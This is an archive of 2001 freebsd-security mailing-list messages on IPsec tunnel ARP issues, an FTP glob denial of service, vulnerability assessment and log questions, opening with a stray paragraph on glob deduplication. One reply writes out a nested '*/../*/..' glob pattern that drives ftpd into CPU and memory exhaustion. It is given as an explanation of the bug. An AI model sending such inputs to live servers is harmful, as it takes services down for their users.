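The naive column grows as 3**(k+1) while the dedup column stays at 3, even though both resolve to the same three directories. Collapsing collisions does change what the caller gets back (each directory once instead of once per path spelling), which is the design trade-off a glob() change along these lines would have to accept.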




From owner-freebsd-security  Thu Mar 15 19:38:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
	by hub.freebsd.org (Postfix) with ESMTP id 1A30237B727
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 19:38:24 -0800 (PST)
	(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
	by shorty.ahpcns.com (Postfix) with ESMTP
	id 041EA3A2DD; Thu, 15 Mar 2001 21:38:20 -0600 (CST)
Message-ID: <3AB18AAC.9069CBF2@ahpcns.com>
Date: Thu, 15 Mar 2001 21:38:20 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Mike Burgett <mburgett@awen.com>
Cc: "freebsd-security@FreeBSD.ORG" <freebsd-security@FreeBSD.ORG>
Subject: Re: IPSEC tunnel without gif?
References: <200103150440.f2F4eZB25117@dragon.awen.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mike Burgett wrote:

> On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote:
>
> >The gateway that received the pings was transmitting ARP
> >requests but strangely, it was trying to get the hardware
> >address of the other tunnel endpoint rather than that of
> >the router in the middle. Since the ARP requests were never
> >answered, the ping response was never transmitted.
>
> This sounds an awful lot like:
>
> http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079
>
> I added a static arp entry for my router awhile back to work around this
> very thing.
>
> Thanks,
> Mike

Yup, that's it. I got the same thing testing with a straight (no ipsec) gif
tunnel too. Are you running this in a "production" environment or just
playing with it? Has it proven reliable with the static arp entry? I was
pleasantly surprised to find that I didn't have any PMTUD problems today
(with ipsec up) like I did with PPTP.

                        Thanks    ...jgm






From owner-freebsd-security  Thu Mar 15 21:29:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from coconut.itojun.org (coconut.itojun.org [210.160.95.97])
	by hub.freebsd.org (Postfix) with ESMTP id 2269937B718
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 21:29:53 -0800 (PST)
	(envelope-from itojun@itojun.org)
Received: from kiwi.itojun.org (localhost.itojun.org [127.0.0.1])
	by coconut.itojun.org (8.9.3+3.2W/3.7W) with ESMTP id OAA19429;
	Fri, 16 Mar 2001 14:29:36 +0900 (JST)
To: jomor <jomor@ahpcns.com>
Cc: Mike Burgett <mburgett@awen.com>,
	"freebsd-security@FreeBSD.ORG" <freebsd-security@FreeBSD.ORG>
In-reply-to: jomor's message of Thu, 15 Mar 2001 21:38:20 CST.
      <3AB18AAC.9069CBF2@ahpcns.com>
X-Template-Reply-To: itojun@itojun.org
X-Template-Return-Receipt-To: itojun@itojun.org
X-PGP-Fingerprint: F8 24 B4 2C 8C 98 57 FD  90 5F B4 60 79 54 16 E2
Subject: Re: IPSEC tunnel without gif?
From: itojun@iijlab.net
Date: Fri, 16 Mar 2001 14:29:36 +0900
Message-ID: <19427.984720576@coconut.itojun.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


>> >The gateway that received the pings was transmitting ARP
>> >requests but strangely, it was trying to get the hardware
>> >address of the other tunnel endpoint rather than that of
>> >the router in the middle. Since the ARP requests were never
>> >answered, the ping response was never transmitted.

	So you are seeing ARP for tunnel inner addresses?

http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85

	That should fix the above issue.  Not sure about FreeBSD merge status.

itojun



From owner-freebsd-security  Thu Mar 15 21:59:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
	by hub.freebsd.org (Postfix) with ESMTP id A4BA637B718
	for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 21:59:13 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id 596A466B09; Thu, 15 Mar 2001 21:59:13 -0800 (PST)
Date: Thu, 15 Mar 2001 21:59:13 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: "Michael A. Dickerson" <mikey@singingtree.com>
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315215913.A70990@mollari.cthul.hu>
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="a8Wt8u1KmwUX3Y2C"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <004b01c0ada9$99f7b540$db9497cf@singingtree.com>; from mikey@singingtree.com on Thu, Mar 15, 2001 at 03:42:29PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org



On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > 4.1 from Aug 10th is hurt by it.
> >
> >          ---Mike
> >
> 
> So is 4.3-beta (otherwise known as 4-stable) from March 8.  ftpd uses 100%
> cpu and memory use grows until the kernel runs out of swap space and starts
> killing processes.  This was an ftp connection with a regular username and
> password, in an average home directory.

I'm pretty sure (but haven't tested) that resource limits will prevent
this problem.  Your ftpd shouldn't be using a large amount of memory
under normal operating procedures, so you can set those to reasonable
values and not suffer any ill effects.

Kris



From owner-freebsd-security  Thu Mar 15 22:37:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
	by hub.freebsd.org (Postfix) with ESMTP id A202237B718
	for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 22:37:40 -0800 (PST)
	(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Thu, 15 Mar 2001 22:35:38 -0800
Received: (from cjc@localhost)
	by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2G6bbD09511;
	Thu, 15 Mar 2001 22:37:37 -0800 (PST)
	(envelope-from cjc)
Date: Thu, 15 Mar 2001 22:37:36 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Kris Kennaway <kris@obsecurity.org>
Cc: "Michael A. Dickerson" <mikey@singingtree.com>,
	freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315223736.C28471@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>; from kris@obsecurity.org on Thu, Mar 15, 2001 at 09:59:13PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Mar 15, 2001 at 09:59:13PM -0800, Kris Kennaway wrote:
> On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > 4.1 from Aug 10th is hurt by it.
> > >
> > >          ---Mike
> > >
> > 
> > So is 4.3-beta (otherwise known as 4-stable) from March 8.  ftpd uses 100%
> > cpu and memory use grows until the kernel runs out of swap space and starts
> > killing processes.  This was an ftp connection with a regular username and
> > password, in an average home directory.
> 
> I'm pretty sure (but haven't tested) that resource limits will prevent
> this problem.  Your ftpd shouldn't be using large amount of memory
> under normal operating procedures, so you can set those to reasonable
> values and not suffer any ill effects.

And this really does not have a lot directly to do with ftpd. Try,

  $ ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/

At a command line and watch what the shell does. It's a general
globbing issue.

Anyway, as for ftpd, all a user can do is kill the ftpd process they are
using, provided, as Kris points out, resource limits are set
appropriately. The user can do pretty much the same thing by logging
out.
-- 
Crist J. Clark                           cjclark@alum.mit.edu



From owner-freebsd-security  Thu Mar 15 23: 3:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from xocah.holywar.net (xocah.holywar.net [211.232.152.22])
	by hub.freebsd.org (Postfix) with SMTP id C02A237B718
	for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 23:03:18 -0800 (PST)
	(envelope-from tsoi@xocah.holywar.net)
Received: (qmail 11778 invoked by uid 101); 16 Mar 2001 07:03:11 -0000
Date: Fri, 16 Mar 2001 16:03:11 +0900
From: "ho-sang, yoon" <tsoi@xocah.holywar.net>
To: freebsd-security@freebsd.org
Cc: Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315215913.A70990@mollari.cthul.hu>
Reply-To: tsoi@xocah.holywar.net
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mmmm..


-----------------------------------------------------------------------------
$ uname -a
FreeBSD 4.2-STABLE
$ whoami
ftp
$ ulimit -a
cpu time               (seconds, -t)  unlimited
file size           (512-blocks, -f)  unlimited
data seg size           (kbytes, -d)  524288
stack size              (kbytes, -s)  65536
core file size      (512-blocks, -c)  102400
max memory size         (kbytes, -m)  20480
locked memory           (kbytes, -l)  10240
max user processes              (-u)  8211
open files                      (-n)  16424
sbsize                   (bytes, -b)  unlimited
-----------------------------------------------------------------------------


---top-----------------------------------------------------------------------
  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
 6379 root      55   0 33360K 33016K RUN      0:40 86.02% 84.67% ftpd
[cut]
-----------------------------------------------------------------------------


And I killed the pid in another terminal.

I don't think that the resource limit has any effect on this matter.
Or am I wrong about something?

-- 
no signature



From owner-freebsd-security  Fri Mar 16  1:25:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pooh.noc.u-net.net (pooh.noc.u-net.net [195.102.252.112])
	by hub.freebsd.org (Postfix) with ESMTP id 9E46B37B71A
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 01:25:46 -0800 (PST)
	(envelope-from peterm@vianetworks.co.uk)
Received: from localhost.noc.u-net.net ([127.0.0.1] helo=vianetworks.co.uk)
	by pooh.noc.u-net.net with esmtp (Exim 3.20 #1)
	id 14dqTx-000M5H-00
	for freebsd-security@FreeBSD.ORG; Fri, 16 Mar 2001 09:25:13 +0000
Message-ID: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Date: Fri, 16 Mar 2001 09:25:13 +0000
From: Peter McGarvey <peterm@vianetworks.co.uk>
Organization: VIA NETdotWORKS
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security <freebsd-security@FreeBSD.ORG>
Subject: What's vunerable?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've just inherited several FreeBSD boxes.  The versions range from
3.2_RELEASE to 4.1_RELEASE.

On the BSD boxes I already maintain I cvsup and make world on a monthly
basis - or as soon as I see a CERT advisory that I know relates to
something that can bite.  But the inherited boxes need a lot of work,
and I cannot guarantee to "The Powers That Be" that a make world won't
break the box.

What I really need to know is what vulnerabilities exist on each box -
so that I can present the boss with a risk assessment, and make him
decide if the box stays as is, or gets a make world.

So any advice anyone can give me, on how to find out what's vulnerable
with any particular FreeBSD version, would be greatly appreciated.

-- 
TTFN, FNORD

Peter McGarvey
System Administrator
Network Operations, VIA Networks UK



From owner-freebsd-security  Fri Mar 16  1:34:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lastebil.math.ntnu.no (lastebil.math.ntnu.no [129.241.211.200])
	by hub.freebsd.org (Postfix) with SMTP id BF21937B758
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 01:34:38 -0800 (PST)
	(envelope-from perchrh@stud.math.ntnu.no)
Received: (qmail 28892 invoked by uid 23781); 16 Mar 2001 09:34:41 -0000
Date: Fri, 16 Mar 2001 10:34:41 +0100 (MET)
From: Per Christian Henden <perchrh@stud.math.ntnu.no>
X-X-Sender:  <perchrh@lastebil.math.ntnu.no>
To: <freebsd-security@FreeBSD.ORG>
Subject: weird error messages (at least I don't understand them)
Message-ID: <Pine.GSO.4.33.0103161022470.28592-100000@lastebil.math.ntnu.no>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

My daily "security check output" (autogenerated mail sent to root, enabled
by default in FreeBSD) contains a varying number of lines just like this:

arp: unknown hardware address format (0x0800)

Is this something I should be worried about?

These entries (or something similar) also appear fairly frequently
(I replaced my real DNS name with "my.hostname.domain"):

Checking for rejected mail hosts:
   5 malvix.hist.no
   2 my.hostname.domain
   2 malvix.hist.no@my.hostname.domain
   1 <malvix.hist.no!kan2na
   1 <kan2na@
   1 <kan2na%malvix.hist.no
   1 <kan2na
   1 <@myhostname.domain:kan2na@malvix.hist.no

This looks kinda suspicious to me, what could it mean?

I figured freebsd-security would be a fitting place to ask, since it's
about the output from the "freebsd security check" script.

-- 
Per Christian Henden, perchrh@stud.ntnu.no
---------------------
Most people wouldn't know music if it came up and bit them on the ass.
		-- Frank Zappa




From owner-freebsd-security  Fri Mar 16  1:40: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
	by hub.freebsd.org (Postfix) with ESMTP id CBA3237B719
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 01:40:04 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id 5236166EAE; Fri, 16 Mar 2001 01:40:04 -0800 (PST)
Date: Fri, 16 Mar 2001 01:40:04 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Peter McGarvey <peterm@vianetworks.co.uk>
Cc: freebsd-security <freebsd-security@FreeBSD.ORG>
Subject: Re: What's vunerable?
Message-ID: <20010316014004.A86953@mollari.cthul.hu>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="ZGiS0Q5IWpPtfppv"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org



On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey wrote:
> I've just inherited several FreeBSD boxes.  The versions range from
> 3.2_RELEASE to 4.1_RELEASE.
> 
> On the BSD boxes I already maintain I cvsup and make world on a monthly
> basis - or as soon as I see a CERT advisory that I know relates to
> something that can bite.  But the inherited boxes need a lot of work,
> and I cannot guarantee to "The Powers That Be" that a make world won't
> break the box.
> 
> What I really need to know is what vulnerabilities exist on each box -
> so that I can present the boss with a risk assessment, and make him
> decide if the box stays as is, or gets a make world.
> 
> So any advice anyone can give me, on how to find out what's vulnerable
> with any particular FreeBSD version, would be greatly appreciated.

Read the advisories.

Kris



From owner-freebsd-security  Fri Mar 16  1:40:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nevada.btk.za.net (nevada.btk.za.net [213.77.120.30])
	by hub.freebsd.org (Postfix) with SMTP id CC61237B71E
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 01:40:23 -0800 (PST)
	(envelope-from freebsd@nevada.btk.za.net)
Received: (from freebsd@localhost)
	by nevada.btk.za.net (8.11.1/8.11.1) id f2GAdsG26666
	for freebsd-security@freebsd.org; Fri, 16 Mar 2001 10:39:54 GMT
	(envelope-from freebsd)
Date: Fri, 16 Mar 2001 10:39:54 +0000
From: Lukasz Pawlik <freebsd@btk.za.net>
To: freebsd-security@freebsd.org
Subject: Invalid hostname
Message-ID: <20010316103954.A24855@btk.za.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,
I'd like to ask for a little help. I don't understand one record
which is printed by last.
ash		ttyp2	invalid hostname Ndz 11 Mar 19:07 - 20:13   (01:06)

What is the 'invalid hostname'? If DNS failed, why is there no IP?
Can someone explain it to me?
Lukasz


-- 
Lukasz Pawlik
e-mail:Lukasz.Pawlik@kielce.wox.org



From owner-freebsd-security  Fri Mar 16  2: 7: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from closed-networks.com (shady.org [195.153.248.241])
	by hub.freebsd.org (Postfix) with SMTP id 3ADB537B719
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 02:07:07 -0800 (PST)
	(envelope-from marcr@closed-networks.com)
Received: (qmail 88671 invoked by uid 1000); 16 Mar 2001 10:10:11 -0000
Date: Fri, 16 Mar 2001 10:10:11 +0000
From: Marc Rogers <marcr@shady.org>
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316101011.U10016@shady.org>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi



Point your browser at:

http://www.freebsd.org/security/#adv

All the info you need is there. My advice to you though is to
consider synchronising your boxes. It is far far easier to secure
several of the same thing than it is to secure lots of different
things.



Marc Rogers
Head of Network Operations & Security
EDC Group



From owner-freebsd-security  Fri Mar 16  2:19:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from closed-networks.com (shady.org [195.153.248.241])
	by hub.freebsd.org (Postfix) with SMTP id 766A137B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 02:19:55 -0800 (PST)
	(envelope-from marcr@closed-networks.com)
Received: (qmail 88777 invoked by uid 1000); 16 Mar 2001 10:23:02 -0000
Date: Fri, 16 Mar 2001 10:23:02 +0000
From: Marc Rogers <marcr@shady.org>
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316102302.V10016@shady.org>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

on the subject of updating a large number of freebsd boxes...



 I just thought I would throw my twopence worth in, as while working for
a number of entirely freebsd based isps a few years ago, I had to deal
with exactly this problem.

Making world in situ on production servers is a game of Russian roulette.
Most of the time it works, but the older the starting version, the harder
it becomes. The safest way to synchronise a large number of boxes
(in my view) is to play a shell game with them. Take one clean box and
install FreeBSD and whatever base software you need. Then migrate the
customer data from one of your older boxes onto this new one. When you are
comfortable that the new box can replace the old one completely, shut down
the old one and bring up the interfaces on the replacement. Next take the
box you just replaced, and after backing everything up, reinstall the OS.
Use this box to upgrade another, and so on.

When you get the hang of it, it becomes quite a swift process. Please ensure
that you do back everything up though, as I can guarantee you will forget
something.


If you need any further help, feel free to mail me.



Marc Rogers
Head of Network Operations & Security
EDC Group



From owner-freebsd-security  Fri Mar 16  2:26:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195])
	by hub.freebsd.org (Postfix) with ESMTP id 9D2BF37B719
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 02:26:14 -0800 (PST)
	(envelope-from sakane@ydc.co.jp)
Received: from localhost ([3ffe:501:481d:1000:260:1dff:fe21:f766])
	by mine.kame.net (8.11.1/3.7W) with ESMTP id f2GAR6Y76773;
	Fri, 16 Mar 2001 19:27:07 +0900 (JST)
To: kris@obsecurity.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
In-Reply-To: Your message of "Fri, 16 Mar 2001 01:40:04 -0800"
	<20010316014004.A86953@mollari.cthul.hu>
References: <20010316014004.A86953@mollari.cthul.hu>
X-Mailer: Cue version 0.6 (010224-1625/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20010316192556Q.sakane@ydc.co.jp>
Date: Fri, 16 Mar 2001 19:25:56 +0900
From: Shoichi Sakane <sakane@ydc.co.jp>
X-Dispatcher: imput version 20000228(IM140)
Lines: 8
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > What I really need to know is what vulnerabilities exist on each box -
> > so that I can present the boss with a risk assessment, and make him
> > decide if the box stays as is, or gets a make world.

> Read the advisories.

Why doesn't the maintainer of the OpenSSH port upgrade its version?
The current version of the port is OpenSSH 2.2.0, which has some vulnerability.



From owner-freebsd-security  Fri Mar 16  3:10:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daphne.unloved.org (daphne.unloved.org [62.58.62.165])
	by hub.freebsd.org (Postfix) with ESMTP id DDD6E37B719
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 03:10:21 -0800 (PST)
	(envelope-from ashp@unloved.org)
Received: by daphne.unloved.org (Postfix, from userid 1001)
	id AB7D31176B; Fri, 16 Mar 2001 12:11:58 +0100 (CET)
Date: Fri, 16 Mar 2001 12:11:58 +0100
From: Ashley Penney <ashp@unloved.org>
To: freebsd-security@freebsd.org
Subject: Re: What's vunerable?
Message-ID: <20010316121158.A17693@daphne.unloved.org>
Mail-Followup-To: Ashley Penney <ashp@unloved.org>,
	freebsd-security@freebsd.org
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey said:
> I've just inherited several FreeBSD boxes.  The versions range from
> 3.2_RELEASE to 4.1_RELEASE.
> 
> On the BSD boxes I already maintain I cvsup and make world on a monthly
> basis - or as soon as I see a CERT advisory that I know relates to
> something that can bite.  But the inherited boxes need a lot of work,
> and I cannot guarantee to "The Powers That Be" that a make world wont
> break the box.
> 
> What I really need to know is what vulnerabilities exist on each box -
> so that I can present the boss with a risk assessment, and make him
> decide if the box stays as is, or gets a make world.
> 
> So any advice anyone can give me, on how to find out what's vunerable
> with any particular FreeBSD version, would be greatly appreciated.
 
One suggestion I would have is to pop to www.nessus.org, and use the
scanner they provide.  It can output reports in HTML and so forth, with
pretty graphics for PHB's.  However, it can sometimes trigger false
alarms so I'd run it against the boxes, and check the results by hand.

[I've found this very useful when I suddenly get thrown into 500 boxes,
all running different versions of OS's.]

-- 
"I think our users are a lazy bunch of elitist snobs when it comes to
advocacy."  -- Poul-Henning Kemp on the FreeBSD community.



From owner-freebsd-security  Fri Mar 16  4:45: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
	by hub.freebsd.org (Postfix) with SMTP id DCC9037B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 04:44:57 -0800 (PST)
	(envelope-from roam@orbitel.bg)
Received: (qmail 22337 invoked by uid 1000); 16 Mar 2001 12:44:17 -0000
Date: Fri, 16 Mar 2001 14:44:17 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Shoichi Sakane <sakane@ydc.co.jp>
Cc: kris@obsecurity.org, freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316144417.A22302@ringworld.oblivion.bg>
Mail-Followup-To: Shoichi Sakane <sakane@ydc.co.jp>,
	kris@obsecurity.org, freebsd-security@FreeBSD.ORG
References: <20010316014004.A86953@mollari.cthul.hu> <20010316192556Q.sakane@ydc.co.jp>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316192556Q.sakane@ydc.co.jp>; from sakane@ydc.co.jp on Fri, Mar 16, 2001 at 07:25:56PM +0900
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote:
> > > What I really need to know is what vulnerabilities exist on each box -
> > > so that I can present the boss with a risk assessment, and make him
> > > decide if the box stays as is, or gets a make world.
> 
> > Read the advisories.
> 
> Why doesn't the maintainer of the OpenSSH port upgrade its version?
> The current version of the port is OpenSSH 2.2.0, which has some vulnerability.

The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0
'port revision' 2.  The 'port revision' was bumped twice to indicate
important security fixes.  The 'some vulnerability' you are referring to
is probably the Bleichenbacher attack, which affected nearly all SSH
servers at the time; a fix was promptly added to the FreeBSD port.

G'luck,
Peter

-- 
If I had finished this sentence,



From owner-freebsd-security  Fri Mar 16  4:51:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
	by hub.freebsd.org (Postfix) with SMTP id CE84137B718
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 04:51:21 -0800 (PST)
	(envelope-from roam@orbitel.bg)
Received: (qmail 22441 invoked by uid 1000); 16 Mar 2001 12:50:39 -0000
Date: Fri, 16 Mar 2001 14:50:39 +0200
From: Peter Pentchev <roam@orbitel.bg>
To: Lukasz Pawlik <freebsd@btk.za.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Invalid hostname
Message-ID: <20010316145039.B22302@ringworld.oblivion.bg>
Mail-Followup-To: Lukasz Pawlik <freebsd@btk.za.net>,
	freebsd-security@freebsd.org
References: <20010316103954.A24855@btk.za.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010316103954.A24855@btk.za.net>; from freebsd@btk.za.net on Fri, Mar 16, 2001 at 10:39:54AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Mar 16, 2001 at 10:39:54AM +0000, Lukasz Pawlik wrote:
> Hello,
> I'd like to ask for a little help. I don't understand one record
> which is printed by last.
> ash		ttyp2	invalid hostname Ndz 11 Mar 19:07 - 20:13   (01:06)
> 
> What is the 'invalid hostname'? If DNS failed, why is there no IP?
> Can someone explain it to me?
> Lukasz

'invalid hostname' is what /usr/bin/login puts into the wtmp record,
when it (login) is started with an '-h hostname' argument, and then
the DNS lookup of the specified hostname fails.  Thus, login cannot
put an IP address there, 'cause it's just the IP address lookup that
failed :)

The fun question is how did login get started with an invalid hostname
passed; how did the user in question log in to the machine?  Apparently
it was over the network, was it a telnet, SSH or some other kind of session?

G'luck,
Peter

-- 
If there were no counterfactuals, this sentence would not have been paradoxical.



From owner-freebsd-security  Fri Mar 16  5:13: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2])
	by hub.freebsd.org (Postfix) with ESMTP id 0019437B718
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 05:13:06 -0800 (PST)
	(envelope-from michael@fastmail.ca)
Received: by mail.interchange.ca (Fastmailer, from userid 555)
	id 1B68120AE; Fri, 16 Mar 2001 08:12:33 -0500 (EST)
MIME-Version: 1.0
Message-Id: <3AB21141.0000E1.28395@frodo.searchcanada.ca>
Content-Type: Multipart/Mixed;
  boundary="------------Boundary-00=_XOKA015BHVCNTT4D7TH0"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service 
Cc: bright@wintelcom.net
From: "Michael Richards" <michael@fastmail.ca>
X-Fastmail-IP: 24.43.130.237
Date: Fri, 16 Mar 2001 08:12:33 -0500 (EST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--------------Boundary-00=_XOKA015BHVCNTT4D7TH0
Content-Type: Text/Plain
Content-Transfer-Encoding: 7bit

Normally when I write code to sanitise a user-entered path with a glob
or .. in it, I process the string to remove any directory name
succeeded by a '/..'.

